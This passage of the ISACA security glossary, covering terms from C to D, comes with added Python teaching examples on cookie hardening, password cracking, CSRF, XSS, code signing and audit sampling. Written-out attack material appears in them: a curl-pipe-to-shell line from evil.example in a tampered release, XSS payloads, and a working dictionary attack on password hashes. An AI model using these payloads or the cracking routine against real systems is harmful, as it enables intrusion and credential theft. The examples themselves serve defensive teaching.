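"""Audit of Set-Cookie headers for the attributes that limit cookie theft and
misuse (Secure, HttpOnly, SameSite), with a helper that rewrites a weak header
into a hardened one. Added example, not part of the ISACA glossary; the header
lines and the session cookie name are constructed."""
from typing import Dict, List

SESSION_COOKIES = ("sessionid",)   # assumed name of the authentication cookie

# Constructed responses: a weak session cookie, its hardened form, a preference cookie
SAMPLE_HEADERS = [
    "Set-Cookie: sessionid=3fa9c2e1; Path=/",
    "Set-Cookie: sessionid=3fa9c2e1; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: theme=dark; Path=/; Max-Age=31536000; SameSite=Lax",
]


def parse_set_cookie(header: str) -> Dict:
    """Split a Set-Cookie header into name, value and a lower-cased attribute map."""
    _, _, body = header.partition(":")
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() or True      # flag attributes carry no value
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(cookie: Dict, is_session: bool) -> List[str]:
    """Findings for one cookie; an empty list means the expected protections are present."""
    a = cookie["attrs"]
    findings = []
    if "secure" not in a:
        findings.append("missing Secure: sent over plaintext HTTP, so it can be sniffed")
    if is_session and "httponly" not in a:
        findings.append("missing HttpOnly: page script (e.g. injected via XSS) can read it")
    if str(a.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF)")
    return findings


def audit_headers(headers: List[str], session_names=SESSION_COOKIES) -> List[List[str]]:
    results = []
    for h in headers:
        c = parse_set_cookie(h)
        results.append(audit_cookie(c, c["name"] in session_names))
    return results


_CANON = {"path": "Path", "domain": "Domain", "expires": "Expires", "max-age": "Max-Age",
          "secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}


def harden(header: str, is_session: bool) -> str:
    """Rewrite a header so it passes audit_cookie; existing attributes are kept."""
    c = parse_set_cookie(header)
    attrs = dict(c["attrs"])
    attrs.setdefault("secure", True)
    if is_session:
        attrs.setdefault("httponly", True)
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        attrs["samesite"] = "Lax"
    out = [f"{c['name']}={c['value']}"]
    for k, v in attrs.items():
        key = _CANON.get(k, k)
        out.append(key if v is True else f"{key}={v}")
    return "Set-Cookie: " + "; ".join(out)


if __name__ == "__main__":
    for h, findings in zip(SAMPLE_HEADERS, audit_headers(SAMPLE_HEADERS)):
        print(h, "->", findings or "ok")
    print(harden(SAMPLE_HEADERS[0], is_session=True))
```

HttpOnly is only demanded for the session cookie: a preference cookie that page script legitimately reads does not need it, but every cookie should carry Secure once the site is served over HTTPS.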
Corporate exchange rate: An exchange rate that can be used optionally to perform foreign currency conversion. The corporate exchange rate is generally a standard market rate determined by senior financial management for use throughout the enterprise.
Corporate governance: The system by which enterprises are directed and controlled. The board of directors is responsible for the governance of their enterprise. It consists of the leadership and organizational structures and processes that ensure the enterprise sustains and extends strategies and objectives.
Corporate security officer (CSO): Responsible for coordinating the planning, development, implementation, maintenance and monitoring of the information security program
Corrective control: Designed to correct errors, omissions and unauthorized uses and intrusions, once they are detected
COSO: Committee of Sponsoring Organizations of the Treadway Commission
Scope Note: Its 1992 report "Internal Control - Integrated Framework" is an internationally accepted standard for corporate governance. See www.coso.org.
Countermeasure: Any process that directly reduces a threat or vulnerability
Coupling: Measure of interconnectivity among the structure of software programs. Coupling depends on the interface complexity between modules. This can be defined as the point at which entry or reference is made to a module, and what data pass across the interface.
Scope Note: In application software design, it is preferable to strive for the lowest possible coupling between modules. Simple connectivity among modules results in software that is easier to understand and maintain and is less prone to a ripple or domino effect caused when errors occur at one location and propagate through the system.
Coverage: The proportion of known attacks detected by an intrusion detection system (IDS)
Crack: To "break into" or "get around" a software program
Scope Note: For example, there are certain newsgroups that post serial numbers for pirated versions of software. A cracker may download this information in an attempt to crack the program so he/she can use it. The term is also commonly used for cracking (recovering the plaintext of) a password or other sensitive data.
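Password cracking in the sense the Scope Note ends on, as an added example that is not part of the ISACA glossary: a dictionary attack against constructed "leaked" hash records, contrasting an unsalted fast hash (one precomputed table serves every user) with a salted, iterated hash (every guess must be recomputed per user). The wordlist and the records are constructed; real wordlists run to millions of entries and include the published vendor default passwords.

```python
"""Cracking password hashes by dictionary attack, contrasting an unsalted fast
hash (one lookup table serves every user) with a salted, iterated hash (each
guess must be recomputed per user). Added example, not part of the ISACA
glossary; the wordlist and the "leaked" records are constructed."""
import hashlib
import hmac
from typing import Dict, Tuple

PBKDF2_ROUNDS = 100_000

# Constructed wordlist (real lists hold millions of entries, including the
# published vendor default passwords).
WORDLIST = ["123456", "password", "admin", "letmein", "Welcome1", "qwerty", "Summer2014"]


def digest(scheme: str, salt: str, candidate: str) -> str:
    if scheme == "sha256":
        return hashlib.sha256(candidate.encode()).hexdigest()
    if scheme == "pbkdf2":
        return hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                   salt.encode(), PBKDF2_ROUNDS).hex()
    raise ValueError(f"unknown scheme {scheme}")


# Constructed "stolen" records: user -> (scheme, salt, hex digest)
LEAKED: Dict[str, Tuple[str, str, str]] = {
    "alice": ("sha256", "", digest("sha256", "", "Welcome1")),
    "bob":   ("sha256", "", digest("sha256", "", "admin")),
    "carol": ("pbkdf2", "9f1a", digest("pbkdf2", "9f1a", "letmein")),
    "dave":  ("sha256", "", digest("sha256", "", "correct horse battery staple")),
}


def crack(records: Dict[str, Tuple[str, str, str]], wordlist) -> Tuple[Dict[str, str], Dict[str, int]]:
    """Return ({user: recovered password}, {scheme: hash operations spent})."""
    found: Dict[str, str] = {}
    ops = {"sha256": 0, "pbkdf2": 0}
    # Unsalted fast hash: hash the wordlist once and look every user up in the table.
    table = {digest("sha256", "", w): w for w in wordlist}
    ops["sha256"] += len(wordlist)
    for user, (scheme, salt, h) in records.items():
        if scheme == "sha256":
            if h in table:
                found[user] = table[h]
            continue
        # Salted, iterated hash: no shared table; each guess is recomputed for this salt.
        for w in wordlist:
            ops[scheme] += 1
            if hmac.compare_digest(digest(scheme, salt, w), h):
                found[user] = w
                break
    return found, ops


if __name__ == "__main__":
    found, ops = crack(LEAKED, WORDLIST)
    print(found)
    print("hash operations:", ops)
```

Note that carol's PBKDF2 hash still falls: salting and iteration only remove the shared table and slow each guess, so a password that is in the wordlist is recovered regardless. Dave survives because his passphrase is not in the list, not because of the hash.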
Credentialed analysis: In vulnerability analysis, passive monitoring approaches in which passwords or other access credentials are required
Scope Note: Usually involves accessing a system data object
Criteria: The standards and benchmarks used to measure and present the subject matter and against which an IS auditor evaluates the subject matter
Scope Note: Criteria should be: objective (free from bias), measurable (provide for consistent measurement), complete (include all relevant factors to reach a conclusion), relevant (relate to the subject matter).
In an attestation engagement, benchmarks against which management's written assertion on the subject matter can be evaluated. The practitioner forms a conclusion concerning subject matter by referring to suitable criteria.
Critical functions: Business activities or information that could not be interrupted or unavailable for several business days without significantly jeopardizing operation of the enterprise
Critical infrastructure: Systems whose incapacity or destruction would have a debilitating effect on the economic security of an enterprise, community or nation.
Critical success factor (CSF): The most important issue or action for management to achieve control over and within its IT processes
Criticality: The importance of a particular asset or function to the enterprise, and the impact if that asset or function is not available
Criticality analysis: An analysis to evaluate resources or business functions to identify their importance to the enterprise, and the impact if a function cannot be completed or a resource is not available
Cross-certification: A certificate issued by one certificate authority (CA) to a second CA so that users of the first CA are able to obtain the public key of the second CA and verify the certificates it has created
Scope Note: Often refers to certificates issued to each other by two CAs at the same level in a hierarchy
Cross-site request forgery (CSRF): A type of malicious exploit of a web site whereby unauthorized commands are transmitted from a user that the web site trusts (also known as a one-click attack or session riding); acronym pronounced "sea surf"
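The attack defined above and its standard mitigation, as an added example that is not part of the ISACA glossary: the same state-changing POST is handled once by a handler that trusts the session cookie alone (the forged request succeeds) and once by a handler that also requires a per-session synchronizer token and a same-origin Origin header. The request and session model, the site origin "https://bank.example" and the handler names are constructed.

```python
"""Cross-site request forgery: the same state-changing POST handled by a
handler that trusts the session cookie alone, and by one that also requires a
per-session synchronizer token and a same-origin Origin header. Added example,
not part of the ISACA glossary. The request/session model, the site origin and
the handler names are constructed."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict

SITE_ORIGIN = "https://bank.example"   # assumed application origin


@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    cookies: Dict[str, str]           # sent automatically by the browser, even cross-site
    form: Dict[str, str]
    headers: Dict[str, str] = field(default_factory=dict)


SESSIONS: Dict[str, Session] = {}
BALANCES: Dict[str, int] = {}


def login(user: str, balance: int = 100) -> str:
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = Session(user)
    BALANCES[user] = balance
    return sid


def render_transfer_form(sid: str) -> str:
    """The genuine page embeds the session's token; other origins cannot read it."""
    token = SESSIONS[sid].csrf_token
    return (f'<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{token}">'
            f'<input name="amount"></form>')


def transfer_vulnerable(req: Request) -> str:
    """Trusts the cookie alone: any page that can make the browser POST here succeeds."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if req.method != "POST" or sess is None:
        return "403 not logged in"
    BALANCES[sess.user] -= int(req.form["amount"])
    return "200 transferred"


def transfer_protected(req: Request) -> str:
    """Synchronizer token plus Origin check: a forged request has neither."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if req.method != "POST" or sess is None:
        return "403 not logged in"
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return "403 cross-site origin"
    if not hmac.compare_digest(req.form.get("csrf", ""), sess.csrf_token):
        return "403 bad csrf token"
    BALANCES[sess.user] -= int(req.form["amount"])
    return "200 transferred"


def simulate() -> Dict[str, object]:
    sid = login("alice", 100)
    # Forged request: the attacker's page auto-submits a form to /transfer. The
    # browser attaches alice's cookie, but the page cannot read alice's token.
    forged = Request("POST", {"sid": sid}, {"amount": "40"}, {"Origin": "https://evil.example"})
    r_vuln = transfer_vulnerable(forged)
    r_forged = transfer_protected(forged)
    # Genuine request submitted from the real form
    token = render_transfer_form(sid).split('name="csrf" value="')[1].split('"')[0]
    genuine = Request("POST", {"sid": sid}, {"amount": "10", "csrf": token}, {"Origin": SITE_ORIGIN})
    r_genuine = transfer_protected(genuine)
    return {"vulnerable": r_vuln, "protected_forged": r_forged,
            "protected_genuine": r_genuine, "balance": BALANCES["alice"]}


if __name__ == "__main__":
    for k, v in simulate().items():
        print(f"{k}: {v}")
```

The token check is the primary control; the Origin check and a SameSite attribute on the session cookie are independent layers, so a bug in one does not reopen the hole.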
Cross-site scripting (XSS): A type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites
Scope Note: Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. (OWASP)
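The flaw the OWASP note describes, side by side with the output encoding that closes it, as an added example that is not part of the ISACA glossary. Three output contexts are shown because the correct encoding differs for each (element content, attribute value, JavaScript string), and Python's own HTML parser stands in for the browser to show which tags and attributes the rendered page actually contains. The templates and payloads are constructed.

```python
"""Reflected cross-site scripting: user input placed in HTML output without
encoding, beside the encoded form for three output contexts (element content,
attribute value, JavaScript string). A browser-like parser shows which tags and
attributes actually result. Added example, not part of the ISACA glossary; the
templates and payloads are constructed."""
import html
import json
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed attacker inputs, one per output context
P_ELEMENT = "<script>alert(document.cookie)</script>"
P_ATTR = '" autofocus onfocus="alert(1)'
P_SCRIPT = "</script><img src=x onerror=alert(1)>"


# --- element content ---------------------------------------------------------
def render_vulnerable(query: str) -> str:
    # Input reaches the output unencoded: the flaw the OWASP note describes
    return f"<p>Results for: {query}</p>"


def render_encoded(query: str) -> str:
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# --- attribute value ---------------------------------------------------------
def render_attr_vulnerable(query: str) -> str:
    return f'<input name="q" value="{query}">'


def render_attr_encoded(query: str) -> str:
    # Quote the attribute AND encode quotes inside it
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


# --- JavaScript string inside <script> ---------------------------------------
def render_script_vulnerable(query: str) -> str:
    return f'<script>var q = "{query}";</script>'


def render_script_encoded(query: str) -> str:
    # HTML entity encoding does not apply inside <script>; emit a JSON string
    # literal and break "</" so the data can never close the script element.
    literal = json.dumps(query).replace("</", "<\\/")
    return f"<script>var q = {literal};</script>"


class _Walker(HTMLParser):
    """Collect start tags and attribute names the way a browser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.attrs: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def browser_view(page: str) -> Tuple[List[str], List[str]]:
    w = _Walker()
    w.feed(page)
    w.close()
    return w.tags, w.attrs


if __name__ == "__main__":
    for label, page in [("element", render_vulnerable(P_ELEMENT)),
                        ("element-encoded", render_encoded(P_ELEMENT)),
                        ("attr", render_attr_vulnerable(P_ATTR)),
                        ("attr-encoded", render_attr_encoded(P_ATTR)),
                        ("script", render_script_vulnerable(P_SCRIPT)),
                        ("script-encoded", render_script_encoded(P_SCRIPT))]:
        tags, attrs = browser_view(page)
        print(f"{label:16} tags={tags} attrs={attrs}")
```

The attribute payload never needs a "<": it simply closes the value and adds an event handler, which is why encoding quotes (html.escape with quote=True) matters as much as encoding angle brackets.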
Cryptography: The art of designing, analyzing and attacking cryptographic schemes
Cryptosystem: A pair of algorithms that take a key and convert plaintext to ciphertext and back
Culture: A pattern of behaviors, beliefs, assumptions, attitudes and ways of doing things
Scope Note: COBIT 5 perspective
Customer relationship management (CRM): A way to identify, acquire and retain customers. CRM is also an industry term for software solutions that help an enterprise manage customer relationships in an organized manner.
Cybercop: An investigator of activities related to computer crime
Cyberespionage: Activities conducted in the name of security, business, politics or technology to find information that ought to remain secret. It is not inherently military.
Cybersecurity: The protection of information assets by addressing threats to information processed, stored, and transported by internetworked information systems
Cybersecurity architecture: Describes the structure, components and topology (connections and layout) of security controls within an enterprise's IT infrastructure
Scope Note: The security architecture shows how defense in depth is implemented and how layers of control are linked, and is essential to designing and implementing security controls in any complex environment.
Cyberwarfare: Activities supported by military organizations with the purpose of threatening the survival and well-being of a society or foreign entity
Damage evaluation: The determination of the extent of damage that is necessary to provide for an estimation of the recovery time frame and the potential loss to the enterprise
Dashboard: A tool for setting expectations for an enterprise at each level of responsibility and continuous monitoring of the performance against set targets
Data analysis: Typically in large enterprises in which the amount of data processed by the enterprise resource planning (ERP) system is extremely voluminous, analysis of patterns and trends proves to be extremely useful in ascertaining the efficiency and effectiveness of operations
Scope Note: Most ERP systems provide opportunities for extraction and analysis of data (some with built-in tools) through the use of tools developed by third parties that interface with the ERP systems.
Data classification: The assignment of a level of sensitivity to data (or information) that results in the specification of controls for each level of classification. Levels of sensitivity of data are assigned according to predefined categories as data are created, amended, enhanced, stored or transmitted. The classification level is an indication of the value or importance of the data to the enterprise.
Data classification scheme: An enterprise scheme for classifying data by factors such as criticality, sensitivity and ownership
Data communications: The transfer of data between separate computer processing sites/devices using telephone lines, microwave and/or satellite links
Data custodian: The individual(s) and department(s) responsible for the storage and safeguarding of computerized data
Data dictionary: A database that contains the name, type, range of values, source and authorization for access for each data element in a database. It also indicates which application programs use those data so that when a data structure is contemplated, a list of the affected programs can be generated
Scope Note: May be a stand-alone information system used for management or documentation purposes, or it may control the operation of a database
Data diddling: Changing data with malicious intent before or during input into the system
Data Encryption Standard (DES): An algorithm for encoding binary data
Scope Note: It is a secret key cryptosystem published by the National Bureau of Standards (NBS), the predecessor of the US National Institute of Standards and Technology (NIST). DES and its variants have been replaced by the Advanced Encryption Standard (AES).
Data flow: The flow of data from the input (in Internet banking, ordinarily user input at his/her desktop) to output (in Internet banking, ordinarily data in a bank's central database). Data flow includes travel through the communication lines, routers, switches and firewalls as well as processing through various applications on servers, which process the data from user fingers to storage in a bank's central database.
Data integrity: The property that data meet an a priori expectation of quality and that the data can be relied on
Data leakage: Siphoning out or leaking information by dumping computer files or stealing computer reports and tapes
Data normalization: A structured process for organizing data into tables in such a way that it preserves the relationships among the data
Data owner: The individual(s), normally a manager or director, who has responsibility for the integrity, accurate reporting and use of computerized data
Data retention: Refers to the policies that govern data and records management for meeting internal, legal and regulatory data archival requirements
Data security: Those controls that seek to maintain confidentiality, integrity and availability of information
Data structure: The relationships among files in a database and among data items within each file
Data warehouse: A generic term for a system that stores, retrieves and manages large volumes of data
Scope Note: Data warehouse software often includes sophisticated comparison and hashing techniques for fast searches as well as for advanced filtering.
Database: A stored collection of related data needed by enterprises and individuals to meet their information processing and retrieval requirements
Database administrator (DBA): An individual or department responsible for the security and information classification of the shared data stored on a database system. This responsibility includes the design, definition and maintenance of the database.
Database management system (DBMS): A software system that controls the organization, storage and retrieval of data in a database
Database replication: The process of creating and managing duplicate versions of a database
Scope Note: Replication not only copies a database but also synchronizes a set of replicas so that changes made to one replica are reflected in all of the others. The beauty of replication is that it enables many users to work with their own local copy of a database, but have the database updated as if they were working on a single centralized database. For database applications in which users are distributed widely geographically, replication is often the most efficient method of database access.
Database specifications: These are the requirements for establishing a database application. They include field definitions, field requirements and reporting requirements for the individual information in the database.
Datagram: A packet (encapsulated within a frame containing information) that is transmitted in a packet-switching network from source to destination
Data-oriented systems development: Focuses on providing ad hoc reporting for users by developing a suitable accessible database of information and providing usable data rather than a function
Decentralization: The process of distributing computer processing to different locations within an enterprise
Decision support systems (DSS): An interactive system that provides the user with easy access to decision models and data, to support semistructured decision-making tasks
Decryption: A technique used to recover the original plaintext from the ciphertext so that it is intelligible to the reader. Decryption is the reverse process of encryption.
Decryption key: A digital piece of information used to recover plaintext from the corresponding ciphertext by decryption
Default: A computer software setting or preference that states what will automatically happen in the event that the user has not stated another preference. For example, a computer may have a default setting to launch or start Netscape whenever a GIF file is opened; however, if using Adobe Photoshop is the preference for viewing a GIF file, the default setting can be changed to Photoshop. In the case of default accounts, these are accounts that are provided by the operating system vendor (e.g., root in UNIX).
Default deny policy: A policy whereby access is denied unless it is specifically allowed; the inverse of default allow
Default password: The password used to gain access when a system is first installed on a computer or network device
Scope Note: There is a large list published on the Internet and maintained at several locations. Failure to change these after the installation leaves the system vulnerable.
Defense in depth: The practice of layering defenses to provide added protection. Defense in depth increases security by raising the effort needed in an attack. This strategy places multiple barriers between an attacker and an enterprise's computing and information resources.
Degauss: The application of variable levels of alternating current for the purpose of demagnetizing magnetic recording media
Scope Note: The process involves increasing the alternating current field gradually from zero to some maximum value and back to zero, leaving a very low residue of magnetic induction on the media. Degauss loosely means to erase.
Demilitarized zone (DMZ): A screened (firewalled) network segment that acts as a buffer zone between a trusted and untrusted network
Scope Note: A DMZ is typically used to house systems such as web servers that must be accessible from both internal networks and the Internet.
Demodulation: The process of converting an analog telecommunications signal into a digital computer signal
Demographic: A fact determined by measuring and analyzing data about a population; it relies heavily on survey research and census data.
Denial-of-service attack (DoS): An assault on a service from a single source that floods it with so many requests that it becomes overwhelmed and is either stopped completely or operates at a significantly reduced rate
Depreciation: The process of cost allocation that assigns the original cost of equipment to the periods benefited
Scope Note: The most common method of calculating depreciation is the straight-line method, which assumes that assets should be written off in equal amounts over their lives.
Detailed IS controls: Controls over the acquisition, implementation, delivery and support of IS systems and services, made up of application controls plus those general controls not included in pervasive controls
Detection risk: The risk that the IS auditor's or assurance professional's substantive procedures will not detect an error that could be material, individually or in combination with other errors
Scope Note: See audit risk
Detective application controls: Designed to detect errors that may have occurred based on predefined logic or business rules. Usually executed after an action has taken place and often cover a group of transactions
Detective control: Exists to detect and report when errors, omissions and unauthorized uses or entries occur
Device: A generic term for a computer subsystem, such as a printer, serial port or disk drive. A device frequently requires its own controlling software, called a device driver.
Dial-back: Used as a control over dial-up telecommunications lines. The telecommunications link established through dial-up into the computer from a remote location is interrupted so the computer can dial back to the caller. The link is permitted only if the caller is calling from a valid phone number or telecommunications channel.
Dial-in access control: Prevents unauthorized access from remote users who attempt to access a secured environment. Ranges from a dial-back control to remote user authentication
Digital certificate: A piece of information that binds a public key to the identity of its holder and is digitally signed by a trusted third party (a certificate authority), so that relying parties can verify the authenticity of the public key and hence the holder's digital signatures (see Digital signature, Cross-certification)
Digital certification: A process to authenticate (or certify) a party's digital signature; carried out by trusted third parties
Digital code signing: The process of digitally signing computer code to ensure its integrity
Digital forensics: The process of identifying, preserving, analyzing and presenting digital evidence in a manner that is legally acceptable in any legal proceedings
Digital signature: A piece of information, a digitized form of signature, that provides sender authenticity, message integrity and nonrepudiation. A digital signature is generated by applying a one-way hash function to the message and signing the resulting hash with the sender's private key; anyone holding the sender's public key can verify it.
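The entries for digital signature, digital certificate and digital code signing above, carried through as one working verification chain. This is an added example, not code from the ISACA glossary: the signer hashes a release artefact and signs the digest with its private key; a CA signs the binding of the signer's name to its public key (the certificate); the verifier checks the certificate against the CA key and then the code signature against the certified key. The keys are textbook RSA built from fixed Mersenne primes so the block runs offline without any library; they are teaching keys and are NOT secure (real keys are 2048 bits or more and use a padding scheme such as RSASSA-PSS). The artefact and the names are constructed.

```python
"""Digital signature, digital certificate and code signing in one working chain.
Added example, not part of the ISACA glossary. The keys are built from fixed
Mersenne primes so the block needs no library and runs offline; they are
teaching keys and are NOT secure (real keys are 2048+ bits and use a padding
scheme such as RSASSA-PSS). The artefact and names are constructed."""
import hashlib
from typing import Dict, Tuple

Key = Tuple[int, int]   # (n, exponent)


def make_key(p: int, q: int, e: int = 65537) -> Tuple[Key, Key]:
    """Textbook RSA: public (n, e), private (n, d) with d = e^-1 mod (p-1)(q-1)."""
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))


# Assumed teaching keys: 2^61-1, 2^89-1, 2^107-1 and 2^127-1 are all prime.
SIGNER_PUB, SIGNER_PRIV = make_key((1 << 61) - 1, (1 << 89) - 1)
CA_PUB, CA_PRIV = make_key((1 << 107) - 1, (1 << 127) - 1)


def digest_int(data: bytes) -> int:
    # One-way hash of the message; truncated to 128 bits so it is below both toy moduli
    return int.from_bytes(hashlib.sha256(data).digest()[:16], "big")


def sign(data: bytes, private_key: Key) -> int:
    """signature = hash(data)^d mod n: only the holder of d can produce it."""
    n, d = private_key
    return pow(digest_int(data), d, n)


def verify(data: bytes, signature: int, public_key: Key) -> bool:
    """Recover the signed hash with e and compare it with a fresh hash of the data."""
    n, e = public_key
    return pow(signature, e, n) == digest_int(data)


def _cert_body(subject: str, key: Key) -> bytes:
    return f"{subject}|{key[0]}|{key[1]}".encode()


def issue_certificate(subject: str, subject_key: Key, ca_private: Key) -> Dict:
    """The CA signs the (name, public key) binding: that signed binding is the certificate."""
    return {"subject": subject, "key": subject_key,
            "ca_sig": sign(_cert_body(subject, subject_key), ca_private)}


def verify_certificate(cert: Dict, ca_public: Key) -> bool:
    return verify(_cert_body(cert["subject"], cert["key"]), cert["ca_sig"], ca_public)


def check_release(artefact: bytes, signature: int, cert: Dict, ca_public: Key = CA_PUB) -> str:
    if not verify_certificate(cert, ca_public):
        return "REJECT: certificate not issued by trusted CA"
    if not verify(artefact, signature, cert["key"]):
        return "REJECT: code signature does not match"
    return "trusted"


# Constructed release artefact and a tampered copy
RELEASE = b"#!/bin/sh\necho 'installing agent'\ncp agent /usr/local/bin/\n"
TAMPERED = RELEASE.replace(b"cp agent", b"curl http://evil.example/x | sh; cp agent")


def demo() -> Dict[str, str]:
    cert = issue_certificate("release-signer", SIGNER_PUB, CA_PRIV)
    sig = sign(RELEASE, SIGNER_PRIV)
    rogue = dict(cert, subject="attacker")          # edited certificate: CA signature no longer fits
    return {
        "genuine": check_release(RELEASE, sig, cert),
        "tampered": check_release(TAMPERED, sig, cert),
        "forged": check_release(RELEASE, (sig + 1) % SIGNER_PUB[0], cert),
        "rogue_cert": check_release(RELEASE, sig, rogue),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The order of checks in check_release is the one that matters in practice: a signature that verifies under a key nobody vouches for proves nothing, so the certificate is checked before the code signature.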
Direct reporting engagement: An engagement in which management does not make a written assertion about the effectiveness of their control procedures and an IS auditor provides an opinion about subject matter directly, such as the effectiveness of the control procedures
Disaster: 1. A sudden, unplanned calamitous event causing great damage or loss. Any event that creates an inability on an enterprise's part to provide critical business functions for some predetermined period of time. Similar terms are business interruption, outage and catastrophe.
2. The period when enterprise management decides to divert from normal production responses and exercises its disaster recovery plan (DRP). It typically signifies the beginning of a move from a primary location to an alternate location.
Disaster declaration: The communication to appropriate internal and external parties that the disaster recovery plan (DRP) is being put into operation
Disaster notification fee: The fee that the recovery site vendor charges when the customer notifies them that a disaster has occurred and the recovery site is required
Scope Note: The fee is implemented to discourage false disaster notifications.
Disaster recovery: Activities and programs designed to return the enterprise to an acceptable condition. The ability to respond to an interruption in services by implementing a disaster recovery plan (DRP) to restore an enterprise's critical business functions
Disaster recovery plan (DRP) desk checking: Typically a read-through of a disaster recovery plan (DRP) without any real actions taking place
Scope Note: Generally involves a reading of the plan, discussion of the action items and definition of any gaps that might be identified
Disaster recovery plan (DRP): A set of human, physical, technical and procedural resources to recover, within a defined time and cost, an activity interrupted by an emergency or disaster
Disaster recovery plan (DRP) walk-through: Generally a robust test of the recovery plan requiring that some recovery activities take place and are tested. A disaster scenario is often given and the recovery teams talk through the steps that they would need to take to recover. As many aspects of the plan as possible should be tested
Disaster tolerance: The time gap during which the business can accept the nonavailability of IT facilities
Disclosure controls and procedures: The processes in place designed to help ensure that all material information is disclosed by an enterprise in the reports that it files or submits to the U.S. Securities and Exchange Commission (SEC)
Scope Note: Disclosure controls and procedures also require that disclosures be authorized, complete and accurate, and recorded, processed, summarized and reported within the time periods specified in the SEC rules and forms. Deficiencies in controls, and any significant changes to controls, must be communicated to the enterprise's audit committee and auditors in a timely manner. An enterprise's principal executive officer and financial officer must certify the existence of these controls on a quarterly basis.
Discount rate: An interest rate used to calculate a present value, which might or might not include the time value of money, tax effects, risk or other factors
Discovery sampling: A form of attribute sampling that is used to determine a specified probability of finding at least one example of an occurrence (attribute) in a population
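The arithmetic behind discovery sampling, as an added example that is not part of the ISACA glossary: with an assumed occurrence rate p and independent draws, P(at least one occurrence in n items) = 1 - (1 - p)^n, so the sample size for a required confidence c is the smallest n with (1 - p)^n <= 1 - c. The exact hypergeometric form is included because the independence assumption overstates the sample needed when the sample is a large fraction of the population. The rate, confidence and population figures are constructed.

```python
"""Discovery sampling: how large a sample is needed to have a given confidence of
finding at least one occurrence of an attribute (for example one unauthorized
change in a population of change records). Added example, not part of the
ISACA glossary; the rates and population sizes are constructed."""
import math


def p_at_least_one(sample_size: int, occurrence_rate: float) -> float:
    """P(at least one occurrence) when draws are treated as independent, i.e. the
    sample is a small fraction of the population: 1 - (1 - p)^n."""
    return 1.0 - (1.0 - occurrence_rate) ** sample_size


def discovery_sample_size(occurrence_rate: float, confidence: float) -> int:
    """Smallest n with 1 - (1 - p)^n >= confidence."""
    if not (0.0 < occurrence_rate < 1.0 and 0.0 < confidence < 1.0):
        raise ValueError("rate and confidence must lie strictly between 0 and 1")
    n = math.ceil(math.log(1.0 - confidence) / math.log(1.0 - occurrence_rate))
    while n > 1 and p_at_least_one(n - 1, occurrence_rate) >= confidence:
        n -= 1                                   # guard against rounding in the logs
    while p_at_least_one(n, occurrence_rate) < confidence:
        n += 1
    return n


def p_at_least_one_exact(population: int, occurrences: int, sample_size: int) -> float:
    """Exact (hypergeometric) version for sampling without replacement from a
    finite population that holds `occurrences` items with the attribute."""
    if sample_size > population - occurrences:
        return 1.0                               # every possible sample contains one
    p_none = (math.comb(population - occurrences, sample_size)
              / math.comb(population, sample_size))
    return 1.0 - p_none


def discovery_sample_size_exact(population: int, occurrences: int, confidence: float) -> int:
    for n in range(1, population + 1):
        if p_at_least_one_exact(population, occurrences, n) >= confidence:
            return n
    return population


if __name__ == "__main__":
    # Assumed deviation rate of 1 % and 95 % confidence
    print("independent draws:", discovery_sample_size(0.01, 0.95))
    print("population of 500 with 5 deviations:", discovery_sample_size_exact(500, 5, 0.95))
```

For a 1 % rate and 95 % confidence the independence formula asks for 299 items; if the population is only 500 records holding 5 deviations, the exact calculation needs 225, because each clean item drawn raises the chance that the next one is a deviation.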
Discretionary access control (DAC): A means of restricting access to objects based on the identity of subjects and/or groups to which they belong
Scope Note: The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject.
Disk mirroring: The practice of duplicating data in separate volumes on two hard disks to make storage more fault tolerant. Mirroring provides data protection in the case of disk failure because data are constantly updated to both disks.
Diskless workstations: A workstation or PC on a network that does not have its own disk, but instead stores files on a network file server
Distributed data processing network: A system of computers connected together by a communication network
Scope Note: Each computer processes its data and the network supports the system as a whole. Such a network enhances communication among the linked computers and allows access to shared files.
Distributed denial-of-service attack (DDoS): A denial-of-service (DoS) assault from multiple sources
Diverse routing
The method of routing traffic through split cable facilities or duplicate cable facilities
